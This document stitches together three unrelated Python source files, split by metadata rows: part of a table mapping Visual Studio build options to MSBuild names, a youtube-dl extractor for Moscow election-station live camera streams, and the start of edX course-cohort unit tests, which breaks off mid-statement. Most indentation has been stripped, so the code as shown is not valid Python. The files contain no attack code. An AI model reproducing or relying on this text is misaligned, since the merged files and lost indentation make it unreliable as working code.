               new=['Send'])) # /errorReport:send
_Same(_compile, 'ExceptionHandling',
_Enumeration(['false',
'Sync', # /EHsc
'Async'], # /EHa
new=['SyncCThrow'])) # /EHs
_Same(_compile, 'FavorSizeOrSpeed',
_Enumeration(['Neither',
'Speed', # /Ot
'Size'])) # /Os
_Same(_compile, 'FloatingPointModel',
_Enumeration(['Precise', # /fp:precise
'Strict', # /fp:strict
'Fast'])) # /fp:fast
_Same(_compile, 'InlineFunctionExpansion',
_Enumeration(['Default',
'OnlyExplicitInline', # /Ob1
'AnySuitable'], # /Ob2
new=['Disabled'])) # /Ob0
_Same(_compile, 'Optimization',
_Enumeration(['Disabled', # /Od
'MinSpace', # /O1
'MaxSpeed', # /O2
'Full'])) # /Ox
_Same(_compile, 'RuntimeLibrary',
_Enumeration(['MultiThreaded', # /MT
'MultiThreadedDebug', # /MTd
'MultiThreadedDLL', # /MD
'MultiThreadedDebugDLL'])) # /MDd
_Same(_compile, 'StructMemberAlignment',
_Enumeration(['Default',
'1Byte', # /Zp1
'2Bytes', # /Zp2
'4Bytes', # /Zp4
'8Bytes', # /Zp8
'16Bytes'])) # /Zp16
_Same(_compile, 'WarningLevel',
_Enumeration(['TurnOffAllWarnings', # /W0
'Level1', # /W1
'Level2', # /W2
'Level3', # /W3
'Level4'], # /W4
new=['EnableAllWarnings'])) # /Wall
# Options found in MSVS that have been renamed in MSBuild.
_Renamed(_compile, 'EnableFunctionLevelLinking', 'FunctionLevelLinking',
_boolean) # /Gy
_Renamed(_compile, 'EnableIntrinsicFunctions', 'IntrinsicFunctions',
_boolean) # /Oi
_Renamed(_compile, 'KeepComments', 'PreprocessKeepComments', _boolean) # /C
_Renamed(_compile, 'ObjectFile', 'ObjectFileName', _file_name) # /Fo
_Renamed(_compile, 'OpenMP', 'OpenMPSupport', _boolean) # /openmp
_Renamed(_compile, 'PrecompiledHeaderThrough', 'PrecompiledHeaderFile',
_file_name) # Used with /Yc and /Yu
_Renamed(_compile, 'PrecompiledHeaderFile', 'PrecompiledHeaderOutputFile',
_file_name) # /Fp
_Renamed(_compile, 'UsePrecompiledHeader', 'PrecompiledHeader',
_Enumeration(['NotUsing', # VS recognized '' for this value too.
'Create', # /Yc
'Use'])) # /Yu
_Renamed(_compile, 'WarnAsError', 'TreatWarningAsError', _boolean) # /WX
_ConvertedToAdditionalOption(_compile, 'DefaultCharIsUnsigned', '/J')
# MSVS options not found in MSBuild.
_MSVSOnly(_compile, 'Detect64BitPortabilityProblems', _boolean)
_MSVSOnly(_compile, 'UseUnicodeResponseFiles', _boolean)
# MSBuild options not found in MSVS.
_MSBuildOnly(_compile, 'BuildingInIDE', _boolean)
_MSBuildOnly(_compile, 'CompileAsManaged',
_Enumeration([], new=['false',
'true'])) # /clr
_MSBuildOnly(_compile, 'CreateHotpatchableImage', _boolean) # /hotpatch
_MSBuildOnly(_compile, 'MultiProcessorCompilation', _boolean) # /MP
_MSBuildOnly(_compile, 'PreprocessOutputPath', _string) # /Fi
_MSBuildOnly(_compile, 'ProcessorNumber', _integer) # the number of processors
_MSBuildOnly(_compile, 'TrackerLogDirectory', _folder_name)
_MSBuildOnly(_compile, 'TreatSpecificWarningsAsErrors', _string_list) # /we
_MSBuildOnly(_compile, 'UseUnicodeForAssemblerListing', _boolean) # /FAu
# Defines a setting that needs very customized processing
_CustomGeneratePreprocessedFile(_compile, 'GeneratePreprocessedFile')
# Directives for converting MSVS VCLinkerTool to MSBuild Link.
# See "c:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\1033\link.xml" for
# the schema of the MSBuild Link settings.
# Options that have the same name in MSVS and MSBuild
_Same(_link, 'AdditionalDependencies', _file_list)
_Same(_link, 'AdditionalLibraryDirectories', _folder_list) # /LIBPATH
# /MANIFESTDEPENDENCY:
_Same(_link, 'AdditionalManifestDependencies', _file_list)
_Same(_link, 'AdditionalOptions', _string_list)
_Same(_link, 'AddModuleNamesToAssembly', _file_list) # /ASSEMBLYMODULE
_Same(_link, 'AllowIsolation', _boolean) # /ALLOWISOLATION
_Same(_link, 'AssemblyLinkResource', _file_list) # /ASSEMBLYLINKRESOURCE
_Same(_link, 'BaseAddress', _string) # /BASE
_Same(_link, 'CLRUnmanagedCodeCheck', _boolean) # /CLRUNMANAGEDCODECHECK
_Same(_link, 'DelayLoadDLLs', _file_list) # /DELAYLOAD
_Same(_link, 'DelaySign', _boolean) # /DELAYSIGN
_Same(_link, 'EmbedManagedResourceFile', _file_list) # /ASSEMBLYRESOURCE
_Same(_link, 'EnableUAC', _boolean) # /MANIFESTUAC
_Same(_link, 'EntryPointSymbol', _string) # /ENTRY
_Same(_link, 'ForceSymbolReferences', _file_list) # /INCLUDE
_Same(_link, 'FunctionOrder', _file_name) # /ORDER
_Same(_link, 'GenerateDebugInformation', _boolean) # /DEBUG
_Same(_link, 'GenerateMapFile', _boolean) # /MAP
_Same(_link, 'HeapCommitSize', _string)
_Same(_link, 'HeapReserveSize', _string) # /HEAP
_Same(_link, 'IgnoreAllDefaultLibraries', _boolean) # /NODEFAULTLIB
_Same(_link, 'IgnoreEmbeddedIDL', _boolean) # /IGNOREIDL
_Same(_link, 'ImportLibrary', _file_name) # /IMPLIB
_Same(_link, 'KeyContainer', _file_name) # /KEYCONTAINER
_Same(_link, 'KeyFile', _file_name) # /KEYFILE
_Same(_link, 'ManifestFile', _file_name) # /ManifestFile
_Same(_link, 'MapExports', _boolean) # /MAPINFO:EXPORTS
_Same(_link, 'MapFileName', _file_name)
_Same(_link, 'MergedIDLBaseFileName', _file_name) # /IDLOUT
_Same(_link, 'MergeSections', _string) # /MERGE
_Same(_link, 'MidlCommandFile', _file_name) # /MIDL
_Same(_link, 'ModuleDefinitionFile', _file_name) # /DEF
_Same(_link, 'OutputFile', _file_name) # /OUT
_Same(_link, 'PerUserRedirection', _boolean)
_Same(_link, 'Profile', _boolean) # /PROFILE
_Same(_link, 'ProfileGuidedDatabase', _file_name) # /PGD
_Same(_link, 'ProgramDatabaseFile', _file_name) # /PDB
_Same(_link, 'RegisterOutput', _boolean)
_Same(_link, 'SetChecksum', _boolean) # /RELEASE
_Same(_link, 'StackCommitSize', _string)
_Same(_link, 'StackReserveSize', _string) # /STACK
_Same(_link, 'StripPrivateSymbols', _file_name) # /PDBSTRIPPED
_Same(_link, 'SupportUnloadOfDelayLoadedDLL', _boolean) # /DELAY:UNLOAD
_Same(_link, 'SuppressStartupBanner', _boolean) # /NOLOGO
_Same(_link, 'SwapRunFromCD', _boolean) # /SWAPRUN:CD
_Same(_link, 'TurnOffAssemblyGeneration', _boolean) # /NOASSEMBLY
_Same(_link, 'TypeLibraryFile', _file_name) # /TLBOUT
_Same(_link, 'TypeLibraryResourceID', _integer) # /TLBID
_Same(_link, 'UACUIAccess', _boolean) # /uiAccess='true'
_Same(_link, 'Version', _string) # /VERSION
_Same(_link, 'EnableCOMDATFolding', _newly_boolean) # /OPT:ICF
_Same(_link, 'FixedBaseAddress', _newly_boolean) # /FIXED
_Same(_link, 'LargeAddressAware', _newly_boolean) # /LARGEADDRESSAWARE
_Same(_link, 'OptimizeReferences', _newly_boolean) # /OPT:REF
_Same(_link, 'RandomizedBaseAddress', _newly_boolean) # /DYNAMICBASE
_Same(_link, 'TerminalServerAware', _newly_boolean) # /TSAWARE
_subsystem_enumeration = _Enumeration(
['NotSet',
'Console', # /SUBSYSTEM:CONSOLE
'Windows', # /SUBSYSTEM:WINDOWS
'Native', # /SUBSYSTEM:NATIVE
'EFI Application', # /SUBSYSTEM:EFI_APPLICATION
'EFI Boot Service Driver', # /SUBSYSTEM:EFI_BOOT_SERVICE_DRIVER
'EFI ROM', # /SUBSYSTEM:EFI_ROM
'EFI Runtime', # /SUBSYSTEM:EFI_RUNTIME_DRIVER
'WindowsCE'], # /SUBSYSTEM:WINDOWSCE
new=['POSIX']) # /SUBSYSTEM:POSIX
_target_machine_enumeration = _Enumeration(
['NotSet',
'MachineX86', # /MACHINE:X86
None,
'MachineARM', # /MACHINE:ARM
'MachineEBC', # /MACHINE:EBC
'MachineIA64', # /MACHINE:IA64
None,
'MachineMIPS', # /MACHINE:MIPS
'MachineMIPS16', # /MACHINE:MIPS16
'MachineMIPSFPU', # /MACHINE:MIPSFPU
'MachineMIPSFPU16', # /MACHINE:MIPSFPU16
None,
None,
None,
'MachineSH4', # /MACHINE:SH4
None,
'MachineTHUMB', # /MACHINE:THUMB
'MachineX64']) # /MACHINE:X64
_Same(_link, 'AssemblyDebug',
_Enumeration(['',
'true', # /ASSEMBLYDEBUG
'false'])) # /ASSEMBLYDEBUG:DISABLE
_Same(_link, 'CLRImageType',
_Enumeration(['Default',
'ForceIJWImage', # /CLRIMAGETYPE:IJW
'ForcePureILImage', # /Switch="CLRIMAGETYPE:PURE
'ForceSafeILImage'])) # /Switch="CLRIMAGETYPE:SAFE
_Same(_link, 'CLRThreadAttribute',
_Enumeration(['DefaultThreadingAttribute', # /CLRTHREADATTRIBUTE:NONE
'MTAThreadingAttribute', # /CLRTHREADATTRIBUTE:MTA
'STAThreadingAttribute'])) # /CLRTHREADATTRIBUTE:STA
_Same(_link, 'DataExecutionPrevention',
_Enumeration(['',
'false', # /NXCOMPAT:NO
'true'])) # /NXCOMPAT
_Same(_link, 'Driver',
_Enumeration(['NotSet',
'Driver', # /Driver
'UpOnly', # /DRIVER:UPONLY
'WDM'])) # /DRIVER:WDM
_Same(_link, 'LinkTimeCodeGeneration',
_Enumeration(['Default',
'UseLinkTimeCodeGeneration', # /LTCG
'PGInstrument', # /LTCG:PGInstrument
'PGOptimization', # /LTCG:PGOptimize
'PGUpdate'])) # /LTCG:PGUpdate
_Same(_link, 'ShowProgress',
_Enumeration(['NotSet',
'LinkVerbose', # /VERBOSE
'LinkVerboseLib'], # /VERBOSE:Lib
new=['LinkVerboseICF', # /VERBOSE:ICF
'LinkVerboseREF', # /VERBOSE:REF
'LinkVerboseSAFESEH', # /VERBOSE:SAFESEH
'LinkVerboseCLR'])) # /VERBOSE:CLR
_Same(_link, 'SubSystem', _subsystem_enumeration)
_Same(_link, 'TargetMachine', _target_machine_enumeration)
_Same(_link, 'UACExecutionLevel',
_Enumeration(['AsInvoker', # /level='asInvoker'
'HighestAvailable', # /level='highestAvailable'
'RequireAdministrator'])) # /level='requireAdministrator'
_Same(_link, 'MinimumRequiredVersion', _string)
_Same(_link, 'TreatLinkerWarningAsErrors', _boolean) # /WX
# Options found in MSVS that have been renamed in MSBuild.
_Renamed(_link, 'ErrorReporting', 'LinkErrorReporting',
_Enumeration(['NoErrorReport', # /ERRORREPORT:NONE
'PromptImmediately', # /ERRORREPORT:PROMPT
'QueueForNextLogin'], # /ERRORREPORT:QUEUE
new=['SendErrorReport'])) # /ERRORREPORT:SEND
_Renamed(_link, 'IgnoreDefaultLibraryNames', 'IgnoreSpecificDefaultLibraries',
_file_list) # /NODEFAULTLIB
_Renamed(_link, 'ResourceOnlyDLL', 'NoEntryPoint', _boolean) # /NOENTRY
_Renamed(_link, 'SwapRunFromNet', 'SwapRunFromNET', _boolean) # /SWAPRUN:NET
_Moved(_link, 'GenerateManifest', '', _boolean)
_Moved(_link, 'IgnoreImportLibrary', '', _boolean)
_Moved(_link, 'LinkIncremental', '', _newly_boolean)
_Moved(_link, 'LinkLibraryDependencies', 'ProjectReference', _boolean)
_Moved(_link, 'UseLibraryDependencyInputs', 'ProjectReference', _boolean)
# MSVS options not found in MSBuild.
_MSVSOnly(_link, 'OptimizeForWindows98', _newly_boolean)
_MSVSOnly(_link, 'UseUnicodeResponseFiles', _boolean)
# MSBuild options not found in MSVS.
_MSBuildOnly(_link, 'BuildingInIDE', _boolean)
_MSBuildOnly(_link, 'ImageHasSafeExceptionHandlers', _boolean) # /SAFESEH
_MSBuildOnly(_link, 'LinkDLL', _boolean) # /DLL Visible='false'
_MSBuildOnly(_link, 'LinkStatus', _boolean) # /LTCG:STATUS
_MSBuildOnly(_link, 'PreventDllBinding', _boolean) # /ALLOWBIND
_MSBuildOnly(_link, 'SupportNobindOfDelayLoadedDLL', _boolean) # /DELAY:NOBIND
_MSBuildOnly(_link, 'TrackerLogDirectory', _folder_name)
_MSBuildOnly(_link, 'MSDOSStubFileName', _file_name) # /STUB Visible='false'
_MSBuildOnly(_link, 'SectionAlignment', _integer) # /ALIGN
_MSBuildOnly(_link, 'SpecifySectionAttributes', _string) # /SECTION
_MSBuildOnly(_link, 'ForceFileOutput',
_Enumeration([], new=['Enabled', # /FORCE
# /FORCE:MULTIPLE
'MultiplyDefinedSymbolOnly',
'UndefinedSymbolOnly'])) # /FORCE:UNRESOLVED
_MSBuildOnly(_link, 'CreateHotPatchableImage',
_Enumeration([], new=['Enabled', # /FUNCTIONPADMIN
'X86Image', # /FUNCTIONPADMIN:5
'X64Image', # /FUNCTIONPADMIN:6
'ItaniumImage'])) # /FUNCTIONPADMIN:16
_MSBuildOnly(_link, 'CLRSupportLastError',
_Enumeration([], new=['Enabled', # /CLRSupportLastError
'Disabled', # /CLRSupportLastError:NO
# /CLRSupportLastError:SYSTEMDLL
'SystemDlls']))
# Directives for converting VCResourceCompilerTool to ResourceCompile.
# See "c:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\1033\rc.xml" for
# the schema of the MSBuild ResourceCompile settings.
_Same(_rc, 'AdditionalOptions', _string_list)
_Same(_rc, 'AdditionalIncludeDirectories', _folder_list) # /I
_Same(_rc, 'Culture', _Integer(msbuild_base=16))
_Same(_rc, 'IgnoreStandardIncludePath', _boolean) # /X
_Same(_rc, 'PreprocessorDefinitions', _string_list) # /D
_Same(_rc, 'ResourceOutputFileName', _string) # /fo
_Same(_rc, 'ShowProgress', _boolean) # /v
# There is no UI in Visual Studio 2008 to set the following properties.
# However, they are found in CL and other tools. Include them here for
# completeness, as they are very likely to have the same usage pattern.
_Same(_rc, 'SuppressStartupBanner', _boolean) # /nologo
_Same(_rc, 'UndefinePreprocessorDefinitions', _string_list) # /u
# MSBuild options not found in MSVS.
_MSBuildOnly(_rc, 'NullTerminateStrings', _boolean) # /n
_MSBuildOnly(_rc, 'TrackerLogDirectory', _folder_name)
# Directives for converting VCMIDLTool to Midl.
# See "c:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\1033\midl.xml" for
# the schema of the MSBuild Midl settings.
_Same(_midl, 'AdditionalIncludeDirectories', _folder_list) # /I
_Same(_midl, 'AdditionalOptions', _string_list)
_Same(_midl, 'CPreprocessOptions', _string) # /cpp_opt
_Same(_midl, 'ErrorCheckAllocations', _boolean) # /error allocation
_Same(_midl, 'ErrorCheckBounds', _boolean) # /error bounds_check
_Same(_midl, 'ErrorCheckEnumRange', _boolean) # /error enum
_Same(_midl, 'ErrorCheckRefPointers', _boolean) # /error ref
_Same(_midl, 'ErrorCheckStubData', _boolean) # /error stub_data
_Same(_midl, 'GenerateStublessProxies', _boolean) # /Oicf
_Same(_midl, 'GenerateTypeLibrary', _boolean)
_Same(_midl, 'HeaderFileName', _file_name) # /h
_Same(_midl, 'IgnoreStandardIncludePath', _boolean) # /no_def_idir
_Same(_midl, 'InterfaceIdentifierFileName', _file_name) # /iid
_Same(_midl, 'MkTypLibCompatible', _boolean) # /mktyplib203
_Same(_midl, 'OutputDirectory', _string) # /out
_Same(_midl, 'PreprocessorDefinitions', _string_list) # /D
_Same(_midl, 'ProxyFileName', _file_name) # /proxy
_Same(_midl, 'RedirectOutputAndErrors', _file_name) # /o
_Same(_midl, 'SuppressStartupBanner', _boolean) # /nologo
_Same(_midl, 'TypeLibraryName', _file_name) # /tlb
_Same(_midl, 'UndefinePreprocessorDefinitions', _string_list) # /U
_Same(_midl, 'WarnAsError', _boolean) # /WX
_Same(_midl, 'DefaultCharType',
_Enumeration(['Unsigned', # /char unsigned
'Signed', # /char signed
'Ascii'])) # /char ascii7
_Same(_midl, 'TargetEnvironment',
_Enumeration(['NotSet',
'Win32', # /env win32
'Itanium', # /env ia64
'X64'])) # /env x64
_Same(_midl, 'EnableErrorChecks',
_Enumeration(['EnableCustom',
'None', # /error none
'All'])) # /error all
_Same(_midl, 'StructMemberAlignment',
_Enumeration(['NotSet',
'1', # Zp1
'2', # Zp2
'4', # Zp4
'8'])) # Zp8
_Same(_midl, 'WarningLevel',
_Enumeration(['0', # /W0
'1', # /W1
'2', # /W2
'3', # /W3
'4'])) # /W4
_Renamed(_midl, 'DLLDataFileName', 'DllDataFileName', _file_name) # /dlldata
_Renamed(_midl, 'ValidateParameters', 'ValidateAllParameters',
_boolean) # /robust
# MSBuild options not found in MSVS.
_MSBuildOnly(_midl, 'ApplicationConfigurationMode', _boolean) # /app_config
_MSBuildOnly(_midl, 'ClientStubFile', _file_name) # /cstub
_MSBuildOnly(_midl, 'GenerateClientFiles',
_Enumeration([], new=['Stub', # /client stub
'None'])) # /client none
_MSBuildOnly(_midl, 'GenerateServerFiles',
             _Enumeration([], new=['Stub', # /server stub
                                   'None'])) # /server none
_MSBuildOnly(_midl, 'LocaleID', _integer) # /lcid DECIMAL
_MSBuildOnly(_midl, 'ServerStubFile', _file_name) # /sstub
_MSBuildOnly(_midl, 'SuppressCompilerWarnings', _boolean) # /no_warn
_MSBuildOnly(_midl, 'TrackerLogDirectory', _folder_name)
_MSBuildOnly(_midl, 'TypeLibFormat',
_Enumeration([], new=['NewFormat', # /newtlb
'OldFormat'])) # /oldtlb
# Directives for converting VCLibrarianTool to Lib.
# See "c:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\1033\lib.xml" for
# the schema of the MSBuild Lib settings.
_Same(_lib, 'AdditionalDependencies', _file_list)
_Same(_lib, 'AdditionalLibraryDirectories', _folder_list) # /LIBPATH
_Same(_lib, 'AdditionalOptions', _string_list)
_Same(_lib, 'ExportNamedFunctions', _string_list) # /EXPORT
_Same(_lib, 'ForceSymbolReferences', _string) # /INCLUDE
_Same(_lib, 'IgnoreAllDefaultLibraries', _boolean) # /NODEFAULTLIB
_Same(_lib, 'IgnoreSpecificDefaultLibraries', _file_list) # /NODEFAULTLIB
_Same(_lib, 'ModuleDefinitionFile', _file_name) # /DEF
_Same(_lib, 'OutputFile', _file_name) # /OUT
_Same(_lib, 'SuppressStartupBanner', _boolean) # /NOLOGO
_Same(_lib, 'UseUnicodeResponseFiles', _boolean)
_Same(_lib, 'LinkTimeCodeGeneration', _boolean) # /LTCG
_Same(_lib, 'TargetMachine', _target_machine_enumeration)
# TODO(jeanluc) _link defines the same value that gets moved to
# ProjectReference. We may want to validate that they are consistent.
_Moved(_lib, 'LinkLibraryDependencies', 'ProjectReference', _boolean)
_MSBuildOnly(_lib, 'DisplayLibrary', _string) # /LIST Visible='false'
_MSBuildOnly(_lib, 'ErrorReporting',
_Enumeration([], new=['PromptImmediately', # /ERRORREPORT:PROMPT
'QueueForNextLogin', # /ERRORREPORT:QUEUE
'SendErrorReport', # /ERRORREPORT:SEND
'NoErrorReport'])) # /ERRORREPORT:NONE
_MSBuildOnly(_lib, 'MinimumRequiredVersion', _string)
_MSBuildOnly(_lib, 'Name', _file_name) # /NAME
_MSBuildOnly(_lib, 'RemoveObjects', _file_list) # /REMOVE
_MSBuildOnly(_lib, 'SubSystem', _subsystem_enumeration)
_MSBuildOnly(_lib, 'TrackerLogDirectory', _folder_name)
_MSBuildOnly(_lib, 'TreatLibWarningAsErrors', _boolean) # /WX
_MSBuildOnly(_lib, 'Verbose', _boolean)
# Directives for converting VCManifestTool to Mt.
# See "c:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\1033\mt.xml" for
# the schema of the MSBuild Mt settings.
# Options that have the same name in MSVS and MSBuild
_Same(_manifest, 'AdditionalManifestFiles', _file_list) # /manifest
_Same(_manifest, 'AdditionalOptions', _string_list)
_Same(_manifest, 'AssemblyIdentity', _string) # /identity:
_Same(_manifest, 'ComponentFileName', _file_name) # /dll
_Same(_manifest, 'GenerateCatalogFiles', _boolean) # /makecdfs
_Same(_manifest, 'InputResourceManifests', _string) # /inputresource
_Same(_manifest, 'OutputManifestFile', _file_name) # /out
_Same(_manifest, 'RegistrarScriptFile', _file_name) # /rgs
_Same(_manifest, 'ReplacementsFile', _file_name) # /replacements
_Same(_manifest, 'SuppressStartupBanner', _boolean) # /nologo
_Same(_manifest, 'TypeLibraryFile', _file_name) # /tlb:
_Same(_manifest, 'UpdateFileHashes', _boolean) # /hashupdate
_Same(_manifest, 'UpdateFileHashesSearchPath', _file_name)
_Same(_manifest, 'VerboseOutput', _boolean) # /verbose
# Options that have moved location.
_MovedAndRenamed(_manifest, 'ManifestResourceFile',
'ManifestResourceCompile',
'ResourceOutputFileName',
_file_name)
_Moved(_manifest, 'EmbedManifest', '', _boolean)
# MSVS options not found in MSBuild.
_MSVSOnly(_manifest, 'DependencyInformationFile', _file_name)
_MSVSOnly(_manifest, 'UseFAT32Workaround', _boolean)
_MSVSOnly(_manifest, 'UseUnicodeResponseFiles', _boolean)
# MSBuild options not found in MSVS.
_MSBuildOnly(_manifest, 'EnableDPIAwareness', _boolean)
_MSBuildOnly(_manifest, 'GenerateCategoryTags', _boolean) # /category
_MSBuildOnly(_manifest, 'ManifestFromManagedAssembly',
_file_name) # /managedassemblyname
_MSBuildOnly(_manifest, 'OutputResourceManifests', _string) # /outputresource
_MSBuildOnly(_manifest, 'SuppressDependencyElement', _boolean) # /nodependency
_MSBuildOnly(_manifest, 'TrackerLogDirectory', _folder_name)
# Directives for MASM.
# See "$(VCTargetsPath)\BuildCustomizations\masm.xml" for the schema of the
# MSBuild MASM settings.
# Options that have the same name in MSVS and MSBuild.
_Same(_masm, 'UseSafeExceptionHandlers', _boolean) # /safeseh
| mit | -7,070,577,698,995,857,000 | 40.099453 | 80 | 0.64924 | false |
vinegret/youtube-dl youtube_dl/extractor/vyborymos.py 73 2031
# coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..compat import compat_str
class VyboryMosIE(InfoExtractor):
_VALID_URL = r'https?://vybory\.mos\.ru/(?:#precinct/|account/channels\?.*?\bstation_id=)(?P<id>\d+)'
_TESTS = [{
'url': 'http://vybory.mos.ru/#precinct/13636',
'info_dict': {
'id': '13636',
'ext': 'mp4',
'title': 're:^Участковая избирательная комиссия №2231 [0-9]{4}-[0-9]{2}-[0-9]{2} [0-9]{2}:[0-9]{2}$',
'description': 'Россия, Москва, улица Введенского, 32А',
'is_live': True,
},
'params': {
'skip_download': True,
}
}, {
'url': 'http://vybory.mos.ru/account/channels?station_id=13636',
'only_matching': True,
}]
def _real_extract(self, url):
station_id = self._match_id(url)
channels = self._download_json(
'http://vybory.mos.ru/account/channels?station_id=%s' % station_id,
station_id, 'Downloading channels JSON')
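        # Editorial note: judging from the unpacking below, each entry of the
        # channels JSON is assumed to be of the form
        # [sid, [host1, host2, ...], name, ...]; these field names are
        # illustrative, not taken from the site's API documentation.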
formats = []
for cam_num, (sid, hosts, name, _) in enumerate(channels, 1):
for num, host in enumerate(hosts, 1):
formats.append({
'url': 'http://%s/master.m3u8?sid=%s' % (host, sid),
'ext': 'mp4',
'format_id': 'camera%d-host%d' % (cam_num, num),
'format_note': '%s, %s' % (name, host),
})
info = self._download_json(
'http://vybory.mos.ru/json/voting_stations/%s/%s.json'
% (compat_str(station_id)[:3], station_id),
station_id, 'Downloading station JSON', fatal=False)
return {
'id': station_id,
'title': self._live_title(info['name'] if info else station_id),
'description': info.get('address'),
'is_live': True,
'formats': formats,
}
| unlicense | 2,872,991,913,881,644,500 | 34.8 | 113 | 0.506348 | false |
jelugbo/ddi common/djangoapps/course_groups/tests/test_cohorts.py 12 19917
import django.test
from django.contrib.auth.models import User
from django.conf import settings
from django.http import Http404
from django.test.utils import override_settings
from mock import call, patch
from student.models import CourseEnrollment
from student.tests.factories import UserFactory
from course_groups.models import CourseUserGroup
from course_groups import cohorts
from course_groups.tests.helpers import topic_name_to_id, config_course_cohorts, CohortFactory
from xmodule.modulestore.django import modulestore, clear_existing_modulestores
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from xmodule.modulestore.tests.django_utils import mixed_store_config
# NOTE: running this with the lms.envs.test config works without
# manually overriding the modulestore. However, running with
# cms.envs.test doesn't.
TEST_DATA_DIR = settings.COMMON_TEST_DATA_ROOT
TEST_MAPPING = {'edX/toy/2012_Fall': 'xml'}
TEST_DATA_MIXED_MODULESTORE = mixed_store_config(TEST_DATA_DIR, TEST_MAPPING)
@patch("course_groups.cohorts.tracker")
class TestCohortSignals(django.test.TestCase):
def setUp(self):
self.course_key = SlashSeparatedCourseKey("dummy", "dummy", "dummy")
def test_cohort_added(self, mock_tracker):
# Add cohort
cohort = CourseUserGroup.objects.create(
name="TestCohort",
course_id=self.course_key,
group_type=CourseUserGroup.COHORT
)
mock_tracker.emit.assert_called_with(
"edx.cohort.created",
{"cohort_id": cohort.id, "cohort_name": cohort.name}
)
mock_tracker.reset_mock()
# Modify existing cohort
cohort.name = "NewName"
cohort.save()
self.assertFalse(mock_tracker.called)
# Add non-cohort group
CourseUserGroup.objects.create(
name="TestOtherGroupType",
course_id=self.course_key,
group_type="dummy"
)
self.assertFalse(mock_tracker.called)
def test_cohort_membership_changed(self, mock_tracker):
cohort_list = [CohortFactory() for _ in range(2)]
non_cohort = CourseUserGroup.objects.create(
name="dummy",
course_id=self.course_key,
group_type="dummy"
)
user_list = [UserFactory() for _ in range(2)]
mock_tracker.reset_mock()
def assert_events(event_name_suffix, user_list, cohort_list):
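            # Asserts that an "edx.cohort.user_<suffix>" tracker event was
            # emitted for every (user, cohort) pair in the given lists.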
mock_tracker.emit.assert_has_calls([
call(
"edx.cohort.user_" + event_name_suffix,
{
"user_id": user.id,
"cohort_id": cohort.id,
"cohort_name": cohort.name,
}
)
for user in user_list for cohort in cohort_list
])
# Add users to cohort
cohort_list[0].users.add(*user_list)
assert_events("added", user_list, cohort_list[:1])
mock_tracker.reset_mock()
# Remove users from cohort
cohort_list[0].users.remove(*user_list)
assert_events("removed", user_list, cohort_list[:1])
mock_tracker.reset_mock()
# Clear users from cohort
cohort_list[0].users.add(*user_list)
cohort_list[0].users.clear()
assert_events("removed", user_list, cohort_list[:1])
mock_tracker.reset_mock()
# Clear users from non-cohort group
non_cohort.users.add(*user_list)
non_cohort.users.clear()
self.assertFalse(mock_tracker.emit.called)
# Add cohorts to user
user_list[0].course_groups.add(*cohort_list)
assert_events("added", user_list[:1], cohort_list)
mock_tracker.reset_mock()
# Remove cohorts from user
user_list[0].course_groups.remove(*cohort_list)
assert_events("removed", user_list[:1], cohort_list)
mock_tracker.reset_mock()
# Clear cohorts from user
user_list[0].course_groups.add(*cohort_list)
user_list[0].course_groups.clear()
assert_events("removed", user_list[:1], cohort_list)
mock_tracker.reset_mock()
# Clear non-cohort groups from user
user_list[0].course_groups.add(non_cohort)
user_list[0].course_groups.clear()
self.assertFalse(mock_tracker.emit.called)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class TestCohorts(django.test.TestCase):
def setUp(self):
"""
Make sure that course is reloaded every time--clear out the modulestore.
"""
clear_existing_modulestores()
self.toy_course_key = SlashSeparatedCourseKey("edX", "toy", "2012_Fall")
def test_is_course_cohorted(self):
"""
Make sure cohorts.is_course_cohorted() correctly reports if a course is cohorted or not.
"""
course = modulestore().get_course(self.toy_course_key)
self.assertFalse(course.is_cohorted)
self.assertFalse(cohorts.is_course_cohorted(course.id))
config_course_cohorts(course, [], cohorted=True)
self.assertTrue(course.is_cohorted)
self.assertTrue(cohorts.is_course_cohorted(course.id))
# Make sure we get a Http404 if there's no course
fake_key = SlashSeparatedCourseKey('a', 'b', 'c')
self.assertRaises(Http404, lambda: cohorts.is_course_cohorted(fake_key))
def test_get_cohort_id(self):
"""
Make sure that cohorts.get_cohort_id() correctly returns the cohort id, or raises a ValueError when given an
invalid course key.
"""
course = modulestore().get_course(self.toy_course_key)
self.assertFalse(course.is_cohorted)
user = UserFactory(username="test", email="a@b.com")
self.assertIsNone(cohorts.get_cohort_id(user, course.id))
config_course_cohorts(course, discussions=[], cohorted=True)
cohort = CohortFactory(course_id=course.id, name="TestCohort")
cohort.users.add(user)
self.assertEqual(cohorts.get_cohort_id(user, course.id), cohort.id)
self.assertRaises(
ValueError,
lambda: cohorts.get_cohort_id(user, SlashSeparatedCourseKey("course", "does_not", "exist"))
)
def test_get_cohort(self):
"""
Make sure cohorts.get_cohort() does the right thing when the course is cohorted
"""
course = modulestore().get_course(self.toy_course_key)
self.assertEqual(course.id, self.toy_course_key)
self.assertFalse(course.is_cohorted)
user = UserFactory(username="test", email="a@b.com")
other_user = UserFactory(username="test2", email="a2@b.com")
self.assertIsNone(cohorts.get_cohort(user, course.id), "No cohort created yet")
cohort = CohortFactory(course_id=course.id, name="TestCohort")
cohort.users.add(user)
self.assertIsNone(
cohorts.get_cohort(user, course.id),
"Course isn't cohorted, so shouldn't have a cohort"
)
# Make the course cohorted...
config_course_cohorts(course, discussions=[], cohorted=True)
self.assertEquals(
cohorts.get_cohort(user, course.id).id,
cohort.id,
"user should be assigned to the correct cohort"
)
self.assertEquals(
cohorts.get_cohort(other_user, course.id).id,
cohorts.get_cohort_by_name(course.id, cohorts.DEFAULT_COHORT_NAME).id,
"other_user should be assigned to the default cohort"
)
def test_auto_cohorting(self):
"""
Make sure cohorts.get_cohort() does the right thing with auto_cohort_groups
"""
course = modulestore().get_course(self.toy_course_key)
self.assertFalse(course.is_cohorted)
user1 = UserFactory(username="test", email="a@b.com")
user2 = UserFactory(username="test2", email="a2@b.com")
user3 = UserFactory(username="test3", email="a3@b.com")
user4 = UserFactory(username="test4", email="a4@b.com")
cohort = CohortFactory(course_id=course.id, name="TestCohort")
# user1 manually added to a cohort
cohort.users.add(user1)
# Add an auto_cohort_group to the course...
config_course_cohorts(
course,
discussions=[],
